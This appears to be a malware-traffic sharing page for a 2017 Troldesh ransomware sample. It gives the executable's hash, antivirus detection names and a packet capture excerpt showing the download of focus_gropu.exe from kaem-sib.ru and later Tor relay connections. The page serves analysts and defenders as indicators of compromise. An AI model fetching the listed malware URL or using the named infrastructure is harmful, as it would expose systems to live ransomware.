RANSOMWARE TOR kaem-sib.ru PCAP File Download Traffic Sample Malware Botnet

Download Attachments

  • 1 pcap focus
    Date added: March 25, 2017 2:20 am Added by: admin File size: 616 KB Downloads: 79

SHA256:     1d75dc020643b59c4b7745887e00730d2fcf1a129fc21d657402341812429891
File name:     focus_gropu.exe
Detection ratio:     51 / 61
Analysis date:     2017-03-25 00:20:49 UTC ( 0 minutes ago )

McAfee-GW-Edition     BehavesLike.Win32.Trojan.dc     20170324
Microsoft     Ransom:Win32/Troldesh.A     20170324
eScan     Trojan.GenericKD.4586233     20170325
NANO-Antivirus     Trojan.Win32.VB.emkvtl     20170324
Palo Alto Networks (Known Signatures)     generic.ml     20170325
Panda     Trj/Genetic.gen     20170324
Qihoo-360     Win32/Trojan.Dropper.489     20170325
Rising     Malware.Generic.5!tfe (cloud:4TqJyxfiS0C)     20170325
SentinelOne (Static ML)     static engine – malicious     20170315
Sophos     Troj/Emogen-BV     20170324
Symantec     Ransom.Kovter     20170324
Tencent     Win32.Trojan.Vb.Wpjn     20170325
TrendMicro     Ransom_CRYPSEN.VC     20170324
TrendMicro-HouseCall     Ransom_CRYPSEN.VC     20170324
VBA32     TScope.Trojan.VB     20170324
VIPRE     Trojan.Win32.Generic!BT     20170325
Webroot     Malicious     20170325
Yandex     Trojan.VB!0amP9/ctkPI     20170323
ZoneAlarm by Check Point     Trojan.Win32.VB.dkbu     20170324

 

 

2017-03-24 22:04:51.615705 IP 192.168.1.102.53116 > 176.57.210.35.80: Flags [P.], seq 2149610031:2149610320, ack 1808991785, win 256, length 289: HTTP: GET /focus_gropu.exe HTTP/1.1
E..Ic.@…Q….f.9.#.|.P. r/k..)P…….GET /focus_gropu.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kaem-sib.ru
Connection: Keep-Alive

2017-03-24 22:06:01.316270 IP 192.168.1.102.53118 > 208.83.223.34.80: Flags [P.], seq 1865667761:1865667961, ack 2691578719, win 256, length 200: HTTP
E….G@….<…f.S.”.~.Po3…n;_P…f…………….{C}f.Tdd…^T..&i.I.Sj…%.i.E….+./.
.       …..3.9./.5……………www.rdurehjc3eat.com………
.4.2………….       .

 

2017-03-24 22:06:04.845631 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 238393047:238393259, ack 2918993764, win 260, length 212
E…IY@…sZ…f………5….OdP…a…………..h..
..k……/….Nx…w.nw.O..c….+./.
.       …..3.9./.5………%.#.. www.sjfywd4kadz7fm2wyfi5t4ne.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.852433 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 3812081279:3812081489, ack 2996902744, win 256, length 210
E…B$@……..fY…..#).7…..XP….c…………..*d.5.e…..$.#d.Z.6..f….K..=/….+./.
.       …..3.9./.5………#.!…www.iprzadmkt4twlqiq2zkf6c.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.892508 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 4258093770:4258093963, ack 4228567313, win 256, length 193
E…:Z@….l…fU
./..#)..Z..
..P…………………)……….?..^…./\…=2v<i….+./.
.       …..3.9./.5…..y………www.x27nr.com………
.4.2………….       .
……………………………..#……………………………
2017-03-24 22:06:04.979745 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 212:338, ack 754, win 258, length 126
E…IZ@…s….f………5….RUP…#…….F…BA..Q.:……..9…..}WNz…Y.M..6<.|.+….R…?…..W.@..6…7′.h………..(…..~…6…..Imv..=|.gN.u…^……h..
2017-03-24 22:06:04.983145 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 210:336, ack 753, win 253, length 126
E…B%@….a…fY…..#).7.Q…HP….Z……F…BA…..`…..8I.j       .7……….m..F.#./.v.u.!…X<10…..!Zx..7-.1>Y……….(.b..~…m….ZW-…JG..R)…|..o.GE….8
2017-03-24 22:06:05.011469 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 193:319, ack 758, win 253, length 126
E…:[@……..fU
./..#)..[..
..P…H
……F…BA..n./w2…”…..g….F.&@……4l..5K………pDVZq…….U….GL……….(K.8.(.T.<-.w.Cb….T…|.._..n….._….
2017-03-24 22:06:05.088478 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 338:376, ack 805, win 257, length 38
E..NI[@…t….f………5.)..R.P………..!…..~…..Z…,…..W..!\..R….
2017-03-24 22:06:05.097271 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 336:374, ack 804, win 253, length 38
E..NB&@……..fY…..#).7…..{P….’……!.b..~……        ..z>……4m……..a
2017-03-24 22:06:05.124872 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 319:357, ack 809, win 253, length 38
E..N:\@……..fU
./..#)..\       .
.9P………..!K.8.(.T..I…..-.{3;Dr.NMq..e.p<.

Leave a Reply